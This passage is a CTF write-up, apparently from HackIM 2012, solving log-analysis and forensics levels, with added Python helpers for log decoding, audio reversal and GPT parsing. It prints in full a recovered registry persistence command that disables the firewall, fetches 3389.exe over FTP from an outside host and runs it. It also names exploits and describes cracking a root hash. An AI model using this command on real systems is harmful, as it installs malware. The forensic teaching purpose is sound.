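    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Base64 alphabet, at least 12 characters, optional padding; shorter runs are mostly noise.
_B64 = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")


def decode_if_text(token: str) -> Optional[str]:
    """Decode a base64 candidate and keep it only if the result is printable ASCII."""
    if len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("ascii")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None
    return text if text.isprintable() and text.strip() else None


def find_encoded_payloads(log_text: str, skip_statuses=("404",)) -> List[Dict]:
    """Walk the log, drop lines with uninteresting statuses and report every
    base64 token in the request path whose decoded form is readable text."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = _LINE.match(line)
        if not m or m.group("status") in skip_statuses:
            continue
        for token in _B64.findall(unquote(m.group("path"))):
            text = decode_if_text(token)
            if text:
                hits.append({"line": lineno, "ip": m.group("ip"),
                             "token": token, "decoded": text})
    return hits
```

Keeping the 404 filter configurable matters: a scanner that found nothing still produced the traffic, and when the question is "who scanned us" rather than "what did they plant", those are the lines to keep.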
Log Analysis 4:

Official Hint: Exploited!!!
Page Source: <!-- md5sum: afcc45de48c327847c507c68ad7e6bf4 Expected Format: CVE-XXXX-XXXX -->
Description: CVE of the Exploit is the Flag

Analysis: This challenge was about finding the CVE of the exploit visible in the log. As mentioned, it was a Burp Suite log. To make it easier to read, I renamed the log file to log.xml and opened it in a web browser. Again this log had many 404 Not Found responses. Going through the first few entries I came across requests to TikiWiki; there were also requests to Joomla, but I preferred to go sequentially. Since I am not good at exploit identification, I browsed to http://nvd.nist.gov/ and searched CVEs for TikiWiki. Most of the results were XSS CVEs, but I could not see any XSS in the log, so I went with the exceptions and eventually got the flag. Honestly, I could not tell which line in the log referred to the CV, but I had the answer to the question. (CVE-2005-1921 is the PEAR XML_RPC eval() injection that affected TikiWiki among other PHP applications; the request to look for is a POST to the application's XML-RPC endpoint carrying PHP code inside the XML.)

Flag: CVE-2005-1921

Log Analysis 5: Waat Laga Server

Official Hint:
Page Source: <!-- md5sum: c641fa00c0a84fd8fd954b3e75d5d6c8 -->
Description: dump.rar

Analysis: Again 95 MB of capture. I loaded it into Wireshark and tried for a few minutes, looking at the first and last few lines, but honestly did not understand it; browsing every line one by one was not realistic. I tried to find an alternative, and all I got were bogus ads for shareware log explorers asking for $$$. I came back to the description and noticed that for one of the flags an exploit author's name was required. I googled "Local Privilege Escalation Exploit" and the search returned some exploit-db entries. The interesting thing I noticed was that a CVE might help me identify the author. The next challenge was to look for a CVE string in such a huge capture; cat did not help, nor did a few other tools, so I eventually ended up with the strings command to pull the CVE out:
I also found the exploit at http://www.exploit-db.com/exploits/9479/ and finally got my first flag for the challenge: Tavis Ormandy, Julien Tinnes. Studying the exploit, I understood from its title that it was a local root exploit (the Linux sock_sendpage() NULL pointer dereference, CVE-2009-2692). Now my expectations of strings were high, and I extracted all the strings from the dump into a plain text file with:

strings dump.pcapng > dump.txt

By then I had a stripped-down version of the capture containing the more important things. Next I looked for the second flag, the root password. Since it was a local root exploit, I searched for the pattern root inside dump.txt and got the hash for root. I used John the Ripper to crack the hash and got my 2nd flag: zuzana

On to the hunt for the 3rd flag, which asked for the vulnerable parameter. Opening dump.txt, I saw there were many 404s, so again it was time to eliminate those and keep the successful responses. With a few variations I stripped dump.txt down to ok.txt, which left much less to analyze. Going through ok.txt I noticed that the parameters page, title and id were common to all the GET requests. Hence, with variations on those parameters, I got the flag. I had to spend a lot of time on all those iterations; this was one of the levels I spent the most time on.

Flag:
  • 29. ===================================================================== Forensics Levels Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno Official Hint: Page Source:<!-- md5sum: 1478ae7166bf5ab5d4f4a4136b819319 --> Description:While conducting the raid on a suspect the police found the system containing no suspicious information in the form of a code. While comparing various files they came up with a suspicious sound file and feel that the code is hidden inside the same.You are asked to find out that code if hidden in the file. Analysis: This was one of the coolest challenge in the HackIM 2012 CTF. I listened to the audio and observed that there was distortion at certain places and also heard that the distortion appeared on single channel. I had earlier used audio editor software “GoldWave”. I opened that audio in GoldWave and separated those distortions from the main stream, since the distortion was on single channel (right) the task became easier. After listening to the distortion it didn’t gave up any meaning, and thought of applying some sound effect, on the very first attempt applying the reverse sound effect I got the flag. Flag: 12344346765 Forensics Level 2: Andar Ch0r Official Hint: A night with MS Office Page Source :<!-- md5sum: 74a967082a6c79757cf56cb29f70e8d9 --> Description: company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the internal codes secretly outside the organization. The company sniffed the data being sent and reconstructed it to find that a word document was being sent. The company strongly suspects that there is some hidden passport code in the document. You as a forensic investigator are provided with the copy of that file and are required to find out the hidden code. The code has to be in whole number. Analysis: This challenge was full of twist, I enjoyed solving it. I opened the given word document and saw some numeric digits; it was some hex values, I converted them into ASCII and was made fool. 
After a while I doubted the file type and checked it with TrID (http://mark0.net/onlinetrid.aspx). The result showed that the file was probably an Excel document. I renamed it to flag.xls and opened it in Excel. I was on the right path, but had no idea what to do next, so I opened the file in Notepad and went through the lines;
somewhere near the end I saw the plain text "Hey Good Job done....." and just below it "Sheet1" and "Sheet2", but I could not recall seeing any Sheet2 in flag.xls. So I figured it was hidden. It had been ages since I had worked with a spreadsheet, so I had forgotten how to hide and unhide sheets. Google gave me http://www.howtogeek.com/howto/14160/hide-and-unhide-worksheets-and-workbooks-in-excel-2007-2010/. Now Sheet2 was visible, but I was still far from the flag. Following the same link, it says to use the VB Editor (ALT+F11) to unhide a "very hidden" worksheet (one whose Visible property is set to xlSheetVeryHidden, which the ordinary Unhide dialog never lists). I saved it, and finally Sheet3 was revealed with the flag in it.

Flag: 6924289
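The GoldWave steps from Forensics Level 1 above, as an added example that is not code from the writeup: isolate one channel of a 16-bit stereo WAV, optionally a sample range, and write it back reversed as a mono file using only the standard library. The stereo signal in make_stereo_wav is constructed for the demonstration; the level's actual audio file is not reproduced, and an MP3 or other compressed input would first need converting to PCM WAV (for example with ffmpeg).

```python
import io
import struct
import wave
from typing import List, Optional


def read_channel(wav_bytes: bytes, channel: int) -> List[int]:
    """Return the 16-bit PCM samples of one channel (0 = left, 1 = right)."""
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        if w.getsampwidth() != 2:
            raise ValueError("only 16-bit PCM is handled here")
        n_ch = w.getnchannels()
        if not 0 <= channel < n_ch:
            raise ValueError("no such channel")
        frames = w.readframes(w.getnframes())
    samples = struct.unpack("<%dh" % (len(frames) // 2), frames)   # WAV is little-endian
    return list(samples[channel::n_ch])                             # interleaved L R L R ...


def reversed_channel_wav(wav_bytes: bytes, channel: int,
                         start: Optional[int] = None, end: Optional[int] = None) -> bytes:
    """Isolate one channel, keep samples [start, end), play them backwards and
    return a mono WAV at the original sample rate (the 'reverse' effect)."""
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        rate = w.getframerate()
    samples = read_channel(wav_bytes, channel)[start:end][::-1]
    out = io.BytesIO()
    with wave.open(out, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(struct.pack("<%dh" % len(samples), *samples))
    return out.getvalue()


def make_stereo_wav(left: List[int], right: List[int], rate: int = 8000) -> bytes:
    """Constructed 16-bit stereo test signal for the demonstration."""
    if len(left) != len(right):
        raise ValueError("channels must be the same length")
    interleaved = [s for pair in zip(left, right) for s in pair]
    out = io.BytesIO()
    with wave.open(out, "wb") as w:
        w.setnchannels(2)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(struct.pack("<%dh" % len(interleaved), *interleaved))
    return out.getvalue()
```

To work on a file, read it with open(path, "rb").read(), call reversed_channel_wav(data, 1) for the right channel, and write the returned bytes to a new .wav; the sample range lets you cut out just the distorted stretch the writeup isolated rather than reversing the whole track.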
Forensics Level 3: Not Guilty!

Official Hint:
Page Source: <!-- md5sum: 66666e32a8296f3073619c1dea43d9bf -->
Description: An employee was suspected of using some malicious files. The employee asserts that he is not guilty because he never used any program except Microsoft word and excel. While conducting the analysis nothing was found in the registry suggesting that something did run automatically. All locations that can run program automatically were examined and nothing malicious was found. You as an investigator are provided with a piece of hive to carve out if anything was deleted from the hive and provide the exact "Value", "value type" and "data" deleted so that the employee gets the justice.

Analysis: This level was all about registry recovery. I had never encountered such a case, and to understand it went through several forensics articles on registry recovery. Initially I downloaded a Windows binary of a tool called Yet Another Registry Utility (YARU). I played with it for some time and realized it would not get me anywhere near the flag. I gave up on it and went through a few more manuals. Eventually I came across a tool called reglookup-recover, which is open source; I installed it on Ubuntu and went through its instructions. It carves deleted keys and values out of the unallocated cells of a hive, which is exactly what the description asks for, so after that it was not hard to get the flag. I came back to the description and cross-checked the recovered values against it, solving the level.

The recovered entry is a Shell value of type REG_SZ, almost certainly the Winlogon Shell value, a classic persistence location: whatever is placed there runs in place of explorer.exe at logon. This one stops the Windows Firewall/ICS service (sharedaccess), writes an FTP script, downloads 3389.exe and runs it.

Flag:
Value: Shell
Value Type: REG_SZ
Data: c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q
Forensics Level 4: Intriguing MBR

Official Hint: Sometimes things spill over
Page Source: <!-- <form id="flevel-4" name="flevel-4" method="post" action="flevel-4-proc.asp" onsubmit="return validate_form(this);"> -->
Description: A suspected drive was found in bad shape. The data extraction was almost impossible and the final copy obtained carried only few bytes. The bytes belonged to the initial sectors and wherever the system could not read the space was filled with 0x00 so as to keep the offset of the data obtained intact. The initial sector displayed a messy MBR data. As a forensic investigator you are required to find the following information:
1) The number of partitions in the damaged drives
2) The start and end LBA for each partition
3) The Start and end of unpartitioned space between two clusters
The Drive showed to be a SATA drive with 512 bytes of LBA

Analysis: Yet another level that kept me from doing anything else. Merely a 20 KB file, but it may take a newbie like me 20 hours to understand. I started with Google on partition forensics and ended up at the GUID Partition Table article on Wikipedia (a long story; I will probably talk about it some other time). So the first thing we needed for this challenge was a boot record parser. I got one at http://www.garykessler.net/software/index.html; the package contained 5 Perl scripts, which I extracted to a folder.

1. I parsed the GUID Partition Table (GPT) header of image.dd using GPTparser.pl
Result of parsing:
2. Back on Wikipedia, there is the layout of the GPT header at LBA 1:
3. In that layout, bytes 72-79 hold the starting LBA of the partition entry array and bytes 80-83 hold the number of partition entries. Comparing the header from image.dd against the table, I concluded that there were 9 partitions (2 primary copies as mentioned, and 7 more), while the entry-count field in the damaged image read 0, which is why the parser had shown none.
4. The description said the LBA size was 512 bytes, and from the parse result the GPT header sits at LBA 1, i.e. at byte offset 512, with the entry-count field at header offset 80. Hence that field is at absolute offset 512 + 80 = 592 (0x250).
5. Time for some hex editing: I opened image.dd, went to position 592 (0x250) and, since we had concluded there were 9 partitions, changed the byte there from 00 to 09.
6. Then I parsed the modified image.dd again,
7. as in step 1, and got all 9 partitions.
8. The next step was to look at each partition type GUID in the result and match it against the table on Wikipedia to find the partition type.
9. Finally, the LBAs thus obtained were not in order, and we had to sort them in ascending order to obtain the flag (the gaps between consecutive partitions give the unpartitioned space asked for in question 3).

Flag:

Forensics Level 5: Universal Swindlers Bayonet

Official Hint:
Page Source: <!-- Format Expected: "DD/MM/YYYY HH:MM:SS" -->
Description: Anusandhaanic Daakus Ltd. is a company whose strength lies in the research it conducts. Very often the employees leaving the organisation manage to carry the research data along with them. This time the company decided to go for an investigation and called upon a forensic investigator. This investigator captured the memory dump and shut the system down. On resuming the system he finds that the drive has been encrypted and is left with only the memory dump. You as an investigator are required to find out the following information from the dump:
1) Serial No. of external drive
2) Date and time (IST) when the drive was first connected
3) Date and time (IST) when the drive was last connected
4) Launching which other executable (Not nullcon.exe) resulted in launching of nullcon.exe

Analysis: This level was all about memory dump investigation. As usual I had to look on Google for memory dump analysis tools, and came across Memoryze and Audit Viewer. I installed them and fired up Audit Viewer to analyze the dump. The GUI was easy to understand and had a wizard which I followed. After a while I had the results in a simple formatted view. I went through the windows but could not find much that was relevant, and ended up getting only the last flag, i.e. the parent process of nullcon.exe.
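The GPT parsing from Forensics Level 4 above, as an added example that is not code from the writeup and not Gary Kessler's GPTparser.pl: it reads the header at LBA 1, verifies the header CRC, walks the partition entries, sorts them by first LBA and reports the unpartitioned runs between neighbours; entry_count_override reproduces the writeup's hex edit of the entry-count field at byte 592 without touching the image. The image in build_sample_image is constructed (three partitions out of order plus an unused slot); the real image.dd is not reproduced, and the three type GUIDs in TYPE_NAMES are the well-known EFI System, Microsoft basic data and Linux filesystem values.

```python
import struct
import uuid
import zlib
from typing import Dict, List, Optional, Tuple

SECTOR = 512
_HEADER = struct.Struct("<8sIIIIQQQQ16sQIII")   # 92-byte GPT header at LBA 1
_ENTRY = struct.Struct("<16s16sQQQ72s")          # 128-byte partition entry

# Well-known partition type GUIDs (spec text form; on disk they are mixed-endian).
TYPE_NAMES = {
    "c12a7328-f81f-11d2-ba4b-00a0c93ec93b": "EFI System",
    "ebd0a0a2-b9e5-4433-87c0-68b6b72699c7": "Microsoft basic data",
    "0fc63daf-8483-4772-8e79-3d69d8477de4": "Linux filesystem",
}


def parse_gpt(image: bytes, entry_count_override: Optional[int] = None) -> Dict:
    """Parse the primary GPT header and its partition entries.

    entry_count_override stands in for the writeup's hex edit: when the header's
    entry count (header offset 80, image byte 592) has been zeroed, pass the
    count to walk instead of trusting the damaged field.
    """
    hdr = image[SECTOR:SECTOR + _HEADER.size]
    (sig, _rev, hdr_size, hdr_crc, _res, _my_lba, _alt_lba, first_usable, last_usable,
     _disk_guid, entries_lba, n_entries, entry_size, _entries_crc) = _HEADER.unpack(hdr)
    if sig != b"EFI PART":
        raise ValueError("no GPT signature at LBA 1")
    zeroed = hdr[:16] + b"\0\0\0\0" + hdr[20:hdr_size]   # CRC is computed with its own field zeroed
    crc_ok = (zlib.crc32(zeroed) & 0xFFFFFFFF) == hdr_crc
    if entry_count_override is not None:
        n_entries = entry_count_override
    parts = []
    base = entries_lba * SECTOR
    for i in range(n_entries):
        off = base + i * entry_size
        type_guid, part_guid, first, last, _attrs, name = _ENTRY.unpack(image[off:off + _ENTRY.size])
        if type_guid == b"\0" * 16:
            continue                                      # unused slot
        tguid = str(uuid.UUID(bytes_le=type_guid))
        parts.append({"index": i, "type": TYPE_NAMES.get(tguid, tguid),
                      "guid": str(uuid.UUID(bytes_le=part_guid)),
                      "first_lba": first, "last_lba": last,
                      "name": name.decode("utf-16-le").rstrip("\0")})
    parts.sort(key=lambda p: p["first_lba"])              # step 9 of the writeup
    return {"header_crc_ok": crc_ok, "first_usable": first_usable,
            "last_usable": last_usable, "partitions": parts}


def unpartitioned_gaps(parts: List[Dict]) -> List[Tuple[int, int]]:
    """Start/end LBA of each unallocated run between consecutive (sorted) partitions."""
    gaps = []
    for a, b in zip(parts, parts[1:]):
        if b["first_lba"] > a["last_lba"] + 1:
            gaps.append((a["last_lba"] + 1, b["first_lba"] - 1))
    return gaps


def build_sample_image(zero_entry_count: bool = False) -> bytes:
    """Constructed image: protective MBR, GPT header, one sector of entries.
    With zero_entry_count=True the header claims 0 entries, like the damaged drive."""
    def entry(type_name: str, first: int, last: int, label: str) -> bytes:
        tguid = next(k for k, v in TYPE_NAMES.items() if v == type_name)
        return _ENTRY.pack(uuid.UUID(tguid).bytes_le, uuid.uuid4().bytes_le,
                           first, last, 0, label.encode("utf-16-le"))
    entries = (entry("EFI System", 2048, 4095, "EFI") +        # deliberately out of LBA order
               entry("Microsoft basic data", 8192, 12287, "DATA") +
               entry("Linux filesystem", 4096, 6143, "ROOT") +
               b"\0" * _ENTRY.size)                           # one unused slot
    mbr = bytearray(SECTOR)
    mbr[446:462] = struct.pack("<BBBBBBBBII", 0, 0, 2, 0, 0xEE, 0xFF, 0xFF, 0xFF, 1, 0xFFFFFFFF)
    mbr[510:512] = b"\x55\xAA"
    n = 0 if zero_entry_count else 4
    fields = [b"EFI PART", 0x00010000, _HEADER.size, 0, 0, 1, 20479, 34, 20446,
              uuid.uuid4().bytes_le, 2, n, _ENTRY.size, zlib.crc32(entries) & 0xFFFFFFFF]
    fields[3] = zlib.crc32(_HEADER.pack(*fields)) & 0xFFFFFFFF
    header = _HEADER.pack(*fields).ljust(SECTOR, b"\0")
    return bytes(mbr) + header + entries
```

After the writeup's hex edit the header CRC no longer matches, so strict tools such as gdisk will warn about a corrupt header; this parser just reports header_crc_ok and carries on, which is the behaviour you want when the evidence image cannot be rewritten.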
Again I went through various links and came across a tool named Volatility. I installed it and played with it for a while. With the following steps I got the rest of the flags:
1. I tried to locate the registry hive where the external drive information would be found.
2. The second-to-last hive listed was the one that stores the drive information (the SYSTEM hive, which is where USBSTOR lives).
3. I dumped the second-to-last hive and got a very long list of registry keys.
4. The challenge was to find the external drive information; from a few analysis articles I learnt that the USBSTOR key (Enum\USBSTOR under the current ControlSet in the SYSTEM hive) records every USB mass storage device that has been connected, with the device serial number in the sub-key name.
5. Hence I ended up with the following command (presumably Volatility's printkey on that hive) and got the result.
6. The flag still was not complete: the page source said the expected time must be in IST, and the registry timestamps are stored in UTC, so we had to add +5:30 to the times when the drive was first connected and last connected.

Flag:

Finally Near The End, Few Words:
- All the links and tools mentioned above were working at the time of this write-up; I cannot assume they will keep working.
- I apologize for any grammatical mistakes and for my poor English.
- The ideas mentioned above are my own and may differ from yours.
- I completely agree that there can be much better ways to solve the above challenges, but eventually my ideas worked out.
- Happy Hacking to Everyone.
- End. Regards to all the members of null.

The epic story ends here.....

~$-THE END-$~